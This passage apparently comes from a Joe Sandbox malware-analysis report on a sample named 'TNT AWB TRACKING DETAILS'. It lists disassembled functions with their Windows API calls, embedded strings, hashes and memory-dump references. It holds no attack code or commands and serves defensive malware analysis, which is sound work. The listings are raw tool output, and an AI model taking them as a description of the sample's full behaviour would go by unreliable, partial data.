                                                    • Instruction ID: 672a2783cc6578d190e4f2cd8beb4f2fc0b8cc7e435ab2ec267bcaca11032fdd
                                                    • Opcode Fuzzy Hash: 3eef37739d99e755cd71dff1180434bb2d19f66d265fd6aef343e679c6504b65
                                                    • Instruction Fuzzy Hash: 26B17B75A0020EEFDB14DFA8CD45FEE7BB4FB08714F205229FA15A62A0DB749851DB50
                                                    Function 00F43DE2 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F43E6F
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F43F2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: 5c77c48e5d6a287361cdc56f00bea30cbd0fc20df245ba8d1132a93baab8f149
                                                    • Instruction ID: 186359c6b12c36b49852e36b5fa0f79df187379d8839598368dc7c0deab75cf1
                                                    • Opcode Fuzzy Hash: 5c77c48e5d6a287361cdc56f00bea30cbd0fc20df245ba8d1132a93baab8f149
                                                    • Instruction Fuzzy Hash: 38A19E316043019BCB04EF24C955F6AB7E5BF85324F14886DBC6AAB392CB71ED4ADB41
                                                    Function 00F1A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F1A47A
                                                    • __swprintf.LIBCMT ref: 00F1A51B
                                                    • _wcscmp.LIBCMT ref: 00F1A52E
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F1A583
                                                    • _wcscmp.LIBCMT ref: 00F1A5BF
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F1A5F6
                                                    • GetDlgCtrlID.USER32(?), ref: 00F1A648
                                                    • GetWindowRect.USER32(?,?), ref: 00F1A67E
                                                    • GetParent.USER32(?), ref: 00F1A69C
                                                    • ScreenToClient.USER32(00000000), ref: 00F1A6A3
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F1A71D
                                                    • _wcscmp.LIBCMT ref: 00F1A731
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F1A757
                                                    • _wcscmp.LIBCMT ref: 00F1A76B
                                                      • Part of subcall function 00EE362C: _iswctype.LIBCMT ref: 00EE3634
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: c137e749726f3a4d6ef2d0d0fc6b1da2e13d23afee9bd0eddcfb3b326c946fe2
                                                    • Instruction ID: 7d80318b96cf7ae744c9b3088fc5345703950a16edac6b0330b0a5dad517bb8f
                                                    • Opcode Fuzzy Hash: c137e749726f3a4d6ef2d0d0fc6b1da2e13d23afee9bd0eddcfb3b326c946fe2
                                                    • Instruction Fuzzy Hash: B2A1F331605306AFD715DF60C884FEAB7E8FF44320F048529F999D2190EB30EA99DB92
                                                    Function 00F1AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00F1AF18
                                                    • _wcscmp.LIBCMT ref: 00F1AF29
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F1AF51
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00F1AF6E
                                                    • _wcscmp.LIBCMT ref: 00F1AF8C
                                                    • _wcsstr.LIBCMT ref: 00F1AF9D
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F1AFD5
                                                    • _wcscmp.LIBCMT ref: 00F1AFE5
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F1B00C
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F1B055
                                                    • _wcscmp.LIBCMT ref: 00F1B065
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00F1B08D
                                                    • GetWindowRect.USER32(00000004,?), ref: 00F1B0F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: 7de10fe9fa8d798a7c26a79861790fb6ec965a944621cc6e71db48f9038a6c5d
                                                    • Instruction ID: e0651819925e28992d764b39964d03d50698e4175960158fd0de12bbb0e63744
                                                    • Opcode Fuzzy Hash: 7de10fe9fa8d798a7c26a79861790fb6ec965a944621cc6e71db48f9038a6c5d
                                                    • Instruction Fuzzy Hash: C281C271508309EFDB04DF20C885FAA77D8EF44324F04846AFD999A096DB34DD8ADB61
                                                    Function 00F1ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: 784ecc65eb59a91ac838782fa9aa0b96162d059ba291cc3ffd36a10656a91168
                                                    • Instruction ID: ae0af8d19f5a7ab1201a988716d1035a9ad8b32043cfb58559089f970691313e
                                                    • Opcode Fuzzy Hash: 784ecc65eb59a91ac838782fa9aa0b96162d059ba291cc3ffd36a10656a91168
                                                    • Instruction Fuzzy Hash: BF319231948309A6FA10FA64DE03FEE77A49B10720F20502EF455710E1EA66AF44AA93
                                                    Function 00F34FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00F35013
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F3501E
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00F35029
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00F35034
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00F3503F
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00F3504A
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00F35055
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00F35060
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00F3506B
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00F35076
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00F35081
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00F3508C
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00F35097
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00F350A2
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00F350AD
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00F350B8
                                                    • GetCursorInfo.USER32(?), ref: 00F350C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$Info
                                                    • String ID:
                                                    • API String ID: 2577412497-0
                                                    • Opcode ID: 6d798757a61b3deb139544fa78e621cb699fdae6f21604514787d2e46a44dd2f
                                                    • Instruction ID: c3017f0e30a0ca20ce63302ebe7866c4cd2a372ac8373398ff2eb933bf451819
                                                    • Opcode Fuzzy Hash: 6d798757a61b3deb139544fa78e621cb699fdae6f21604514787d2e46a44dd2f
                                                    • Instruction Fuzzy Hash: C23115B1D0831E6ADF109FB68C8995FBFE8FF04760F50452AA50CE7280DA79A5008F91
                                                    Function 00F4A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F4A259
                                                    • DestroyWindow.USER32(00000000,?), ref: 00F4A2D3
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F4A34D
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F4A36F
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4A382
                                                    • DestroyWindow.USER32(00000000), ref: 00F4A3A4
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EC0000,00000000), ref: 00F4A3DB
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4A3F4
                                                    • GetDesktopWindow.USER32 ref: 00F4A40D
                                                    • GetWindowRect.USER32(00000000), ref: 00F4A414
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F4A42C
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F4A444
                                                      • Part of subcall function 00EC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EC25EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 8f4f21d461f9f838558700dd82c06dca2d0fc5fe8eba41eb4d5587dcb59181f9
                                                    • Instruction ID: 670d788c1c1392243cbfa7fc6878bb3a8ed0bfd71cc6995fcf3318fd0509c4e4
                                                    • Opcode Fuzzy Hash: 8f4f21d461f9f838558700dd82c06dca2d0fc5fe8eba41eb4d5587dcb59181f9
                                                    • Instruction Fuzzy Hash: DF719A74580208AFD720CF28CC48FAA7BE6FB99710F04451DFD89972B0D775A946EB52
                                                    Function 00F4C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • DragQueryPoint.SHELL32(?,?), ref: 00F4C627
                                                      • Part of subcall function 00F4AB37: ClientToScreen.USER32(?,?), ref: 00F4AB60
                                                      • Part of subcall function 00F4AB37: GetWindowRect.USER32(?,?), ref: 00F4ABD6
                                                      • Part of subcall function 00F4AB37: PtInRect.USER32(?,?,00F4C014), ref: 00F4ABE6
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4C690
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F4C69B
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F4C6BE
                                                    • _wcscat.LIBCMT ref: 00F4C6EE
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F4C705
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4C71E
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F4C735
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F4C757
                                                    • DragFinish.SHELL32(?), ref: 00F4C75E
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F4C851
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 169749273-3440237614
                                                    • Opcode ID: 748a8b8f808f7099fc6c75f2bba1a9c2ff1ad1833049aede97c02fe7d2f31538
                                                    • Instruction ID: 91917c2ff3d7011f3d024576ccfcec37771714d5ab826279db353b973d363756
                                                    • Opcode Fuzzy Hash: 748a8b8f808f7099fc6c75f2bba1a9c2ff1ad1833049aede97c02fe7d2f31538
                                                    • Instruction Fuzzy Hash: 9A61AD71108304AFC701EF64CD85EAFBBE8EF89750F00092EF999931A1DB319949DB92
                                                    Function 00F44392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F44424
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F4446F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: 724dce268cca03ccf71d6b462172fc587ce81bce93031f5cfad2746461949ae8
                                                    • Instruction ID: 023ef7515c65fe717e5609da95009a5108a670512185f0da68c695e1f076b4e1
                                                    • Opcode Fuzzy Hash: 724dce268cca03ccf71d6b462172fc587ce81bce93031f5cfad2746461949ae8
                                                    • Instruction Fuzzy Hash: 09916D716047019BCB04EF10C951B6EBBE1AF95350F05846CEC966B3A3CB75ED8AEB81
                                                    Function 00F4B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F4B8B4
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F491C2), ref: 00F4B910
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4B949
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F4B98C
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4B9C3
                                                    • FreeLibrary.KERNEL32(?), ref: 00F4B9CF
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F4B9DF
                                                    • DestroyIcon.USER32(?,?,?,?,?,00F491C2), ref: 00F4B9EE
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F4BA0B
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F4BA17
                                                      • Part of subcall function 00EE2EFD: __wcsicmp_l.LIBCMT ref: 00EE2F86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1212759294-1154884017
                                                    • Opcode ID: cbc5a3275037e93e8febdedf3f1ed9aa76444bdff3d78bbbfc6e2de1d8404c6a
                                                    • Instruction ID: 808837f1753527cc03b8ec64285e2f81e8d11fe2399f507998a9f99cea3ea057
                                                    • Opcode Fuzzy Hash: cbc5a3275037e93e8febdedf3f1ed9aa76444bdff3d78bbbfc6e2de1d8404c6a
                                                    • Instruction Fuzzy Hash: 2D61CD71940219BAEB14DF64CC45FBA7BACEB08720F10411AFE15E61D2DB74DA81EBA0
                                                    Function 00F2DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00F2DCDC
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F2DCEC
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F2DCF8
                                                    • __wsplitpath.LIBCMT ref: 00F2DD56
                                                    • _wcscat.LIBCMT ref: 00F2DD6E
                                                    • _wcscat.LIBCMT ref: 00F2DD80
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F2DD95
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DDA9
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DDDB
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DDFC
                                                    • _wcscpy.LIBCMT ref: 00F2DE08
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F2DE47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: ac70b9c23083d93013d6f85edf5d2556a886219e961f7c2166a2ef774a595680
                                                    • Instruction ID: 562c9970ffa6b516f46d58881248e2aba26a9c9e7f157184bfe4f2d9f6f48e4e
                                                    • Opcode Fuzzy Hash: ac70b9c23083d93013d6f85edf5d2556a886219e961f7c2166a2ef774a595680
                                                    • Instruction Fuzzy Hash: E3618A725042559FCB10EF60D844EAEB3E8FF89320F04892EF98997251DB35EA45CB92
                                                    Function 00F29C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F29C7F
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F29CA0
                                                    • __swprintf.LIBCMT ref: 00F29CF9
                                                    • __swprintf.LIBCMT ref: 00F29D12
                                                    • _wprintf.LIBCMT ref: 00F29DB9
                                                    • _wprintf.LIBCMT ref: 00F29DD7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 311963372-3080491070
                                                    • Opcode ID: 4649178950d087b7239af34047ea6c9ee64bb4c3dcc8e9a9c656dd3c72f61f9f
                                                    • Instruction ID: 33fdb3c29eb9fa33702b07f5ada6999d4b77e1800081b0f72240bc3decbf50af
                                                    • Opcode Fuzzy Hash: 4649178950d087b7239af34047ea6c9ee64bb4c3dcc8e9a9c656dd3c72f61f9f
                                                    • Instruction Fuzzy Hash: DA51B53290050AABCF14EBE0DE46EEEB7B8AF14310F500065F50972061DB726F5AEF61
                                                    Function 00F2A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F2A3CB
                                                    • GetDriveTypeW.KERNEL32 ref: 00F2A418
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2A460
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2A497
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2A4C5
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: 83093b81bd6bf216fd80d2f20eb95b86e3efded9b30fcd311590315aec55647a
                                                    • Instruction ID: 8ce96c069e4318cb7163db7cb240220e19619f10b749b5660572aafa657597eb
                                                    • Opcode Fuzzy Hash: 83093b81bd6bf216fd80d2f20eb95b86e3efded9b30fcd311590315aec55647a
